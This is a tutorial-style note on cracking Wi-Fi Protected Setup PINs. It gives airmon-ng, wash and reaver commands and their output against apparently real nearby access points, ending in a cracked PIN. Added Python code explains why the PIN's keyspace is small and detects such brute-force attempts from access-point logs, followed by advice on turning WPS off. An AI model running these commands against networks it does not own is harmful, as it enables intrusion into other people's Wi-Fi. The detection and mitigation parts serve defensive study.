Wash + Reaver = WPS pwn

Just wanted to write down some notes on WPS cracking

  1. Get our Wi-Fi card ready (Alfa N card) and put it into monitor mode
  2. root@ragePwnPi:~# airmon-ng start wlan1
    
    Found 4 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID     Name
    1488    ifplugd
    1495    ifplugd
    1989    dhclient
    4091    ifplugd
    Process with PID 4091 (ifplugd) is running on interface wlan1
    
    Interface       Chipset         Driver
    
    wlan1           Atheros AR9271  ath9k - [phy3]
                                    (monitor mode enabled on mon0)
  3. Use wash to find hotspots that are vulnerable
  4. root@ragePwnPi:~# wash -i mon0
    
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
    
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    ---------------------------------------------------------------------------------------------------------------
    00:1D:D1:**:**:**       1            -46        1.0               No                H*****
    00:22:3F:**:**:**       1            -47        1.0               No                m*****
    E0:91:F5:**:**:**       2            -56        1.0               No                O*****
    58:6D:8F:**:**:**       3            -69        1.0               No                L*****
    00:24:B2:**:**:**       7            -72        1.0               No                N*****
    A0:21:B7:**:**:**      11            -71        1.0               No                M*****
    00:1D:D2:**:**:**      11            -80        1.0               No                H*****
  5. Use reaver against the chosen target (here the AP on channel 2) to brute-force its WPS PIN
  6. root@ragePwnPi:~# reaver -i mon0 -b E0:91:F5:**:**:** -vv -c 2
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
    
    [+] Switching mon0 to channel 2
    [+] Waiting for beacon from E0:91:F5:**:**:**
    [+] Associated with E0:91:F5:**:**:** (ESSID: O**)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00005678
  7. Eventually, you *should* succeed and see:
    
    [+] Trying pin 32721867
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 7707 seconds
    [+] WPS PIN: '32721867'
    [+] AP SSID: 'O*****'
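Why "Pin cracked in 7707 seconds" is possible at all, as an added example (my code, not from the post or from reaver): the transcript above shows the AP answering each half of the PIN separately, a WSC NACK straight after M4 when the first half is wrong and M7 only once both halves are right, and the 8th digit of the PIN is a checksum of the other seven. The functions below check that checksum against the PINs quoted in the post, put a number on the resulting keyspace, and classify a reaver exchange by where the NACK lands. The `FAILED_ATTEMPT` and `SUCCESSFUL_ATTEMPT` lists are trimmed copies of the two transcripts above.

```python
"""
Added example, not from the original post: why a WPS PIN falls in hours.

The 8-digit WPS PIN has only 7 free digits (the 8th is a checksum), and
the registrar exchange shown above confirms each half separately: a wrong
first half gets a WSC NACK right after M4, a wrong second half a NACK after
M6, and M7 is only sent once both halves are right. The worst case is
therefore 10**4 + 10**3 = 11,000 attempts rather than 10**8.
"""
import re


def wps_checksum_digit(first_seven: str) -> int:
    """Checksum digit for a 7-digit PIN body (weights 3,1,3,1,3,1,3)."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly 7 decimal digits")
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first_seven))
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN carries the checksum the WPS spec requires."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum_digit(pin[:7])


def effective_keyspace() -> int:
    """Worst-case attempts: 10^4 for the first half plus 10^3 for the second."""
    return 10**4 + 10**3


def naive_keyspace() -> int:
    """What an 8-digit PIN would cost if it had to be guessed as a whole."""
    return 10**8


def worst_case_hours(seconds_per_attempt: float) -> float:
    """Upper bound on brute-force time at a given per-attempt cost."""
    return effective_keyspace() * seconds_per_attempt / 3600


PIN_RE = re.compile(r"Trying pin (\d{8})|WPS PIN: '(\d{8})'")


def pins_in_transcript(lines):
    """PINs mentioned in reaver output ('Trying pin ...' or 'WPS PIN: ...')."""
    found = []
    for line in lines:
        m = PIN_RE.search(line)
        if m:
            found.append(m.group(1) or m.group(2))
    return found


def classify_exchange(lines) -> str:
    """Which stage of the M1..M7 exchange the AP rejected, from reaver output."""
    text = "\n".join(lines)
    if "Received M7 message" in text:
        return "both halves accepted: M7 carries the network credentials"
    if "Sending M6 message" in text and "Received WSC NACK" in text:
        return "second half rejected: NACK after M6"
    if "Sending M4 message" in text and "Received WSC NACK" in text:
        return "first half rejected: NACK after M4"
    return "incomplete exchange"


# Trimmed copies of the two reaver transcripts quoted in the post above.
FAILED_ATTEMPT = [
    "[+] Trying pin 12345670",
    "[+] Received M3 message",
    "[+] Sending M4 message",
    "[+] Received WSC NACK",
]
SUCCESSFUL_ATTEMPT = [
    "[+] Trying pin 32721867",
    "[+] Received M7 message",
    "[+] Sending WSC NACK",
    "[+] WPS PIN: '32721867'",
]

if __name__ == "__main__":
    print(f"{naive_keyspace():,} naive vs {effective_keyspace():,} effective attempts")
    for pin in pins_in_transcript(FAILED_ATTEMPT + SUCCESSFUL_ATTEMPT):
        print(pin, "valid checksum" if is_valid_wps_pin(pin) else "invalid checksum")
    print("failed attempt:", classify_exchange(FAILED_ATTEMPT))
    print("final attempt: ", classify_exchange(SUCCESSFUL_ATTEMPT))
```

All three PINs the post shows reaver trying (12345670, 00005678, 32721867) pass the checksum, which is why the tool never wastes an attempt on an invalid one; the half-by-half confirmation is the design flaw, and the only real fix on the AP side is to turn the PIN method off.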

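Seen from the access point, every rejected PIN in the transcripts above ends with the AP sending a WSC NACK to the same station, so a brute force is a burst of NACKs for one MAC address. As an added example (my code, not from the post), the detector below runs a per-station sliding window over AP-side log lines; the log format and the station addresses are constructed for this example, so a real hostapd or vendor log only needs a different `LINE_RE`.

```python
"""
Added example, not from the original post: spotting a WPS PIN brute force
from the access-point side.

Every rejected PIN in the transcript above ends with the AP sending a
WSC NACK, so an AP log (or a wireless IDS watching EAP/WSC frames) sees a
burst of NACKs for one station address. The log line format here is
constructed for this example; real hostapd or vendor logs look different,
so only the parser needs to change.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: 02:aa:... cycles PINs every few seconds,
# 02:bb:... is a single mistyped PIN from a legitimate user who then succeeds.
SAMPLE_LOG = """\
2012-01-01T14:00:01 wps sta=02:aa:aa:aa:aa:01 msg=M4 result=NACK
2012-01-01T14:00:07 wps sta=02:aa:aa:aa:aa:01 msg=M4 result=NACK
2012-01-01T14:00:13 wps sta=02:aa:aa:aa:aa:01 msg=M4 result=NACK
2012-01-01T14:00:19 wps sta=02:bb:bb:bb:bb:02 msg=M4 result=NACK
2012-01-01T14:00:20 wps sta=02:aa:aa:aa:aa:01 msg=M4 result=NACK
2012-01-01T14:00:26 wps sta=02:aa:aa:aa:aa:01 msg=M4 result=NACK
2012-01-01T14:00:33 wps sta=02:aa:aa:aa:aa:01 msg=M4 result=NACK
2012-01-01T14:00:45 wps sta=02:bb:bb:bb:bb:02 msg=M7 result=ACK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) wps sta=(?P<sta>[0-9a-f:]{17}) msg=(?P<msg>M\d) result=(?P<res>NACK|ACK)$"
)


def parse_line(line: str):
    """Return (timestamp, station, message, result) or None for unrelated lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return (datetime.fromisoformat(m["ts"]), m["sta"], m["msg"], m["res"])


def find_pin_bruteforce(log_text: str, threshold: int = 5,
                        window: timedelta = timedelta(minutes=5)) -> dict:
    """Stations with at least `threshold` WSC NACKs inside any `window`.

    Returns {station: peak NACK count seen in the window}. One deque per
    station holds only the timestamps still inside the window, so memory
    stays bounded however long the log is.
    """
    recent = defaultdict(deque)
    flagged = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None or parsed[3] != "NACK":
            continue
        ts, sta = parsed[0], parsed[1]
        q = recent[sta]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[sta] = max(flagged.get(sta, 0), len(q))
    return flagged


if __name__ == "__main__":
    for sta, n in find_pin_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT: {n} WPS NACKs from {sta} within 5 minutes: likely PIN brute force")
```

The single NACK from the second station stays under the threshold, so a user mistyping a PIN does not trip the alert. Detection only buys time, though: the "WPS Locked" column in the wash output is the AP's own rate limit, and it is absent for every AP in that scan. On hostapd the durable fix is `wps_state=0` (WPS off) or at least `ap_setup_locked=1`; on consumer routers it is the "disable WPS PIN" switch, followed by a check with wash that the AP no longer advertises WPS.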